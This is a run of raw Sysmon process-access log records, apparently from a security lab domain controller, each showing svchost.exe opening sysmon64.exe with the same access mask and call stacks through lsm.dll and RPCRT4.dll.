12:01:02.396{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.395{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
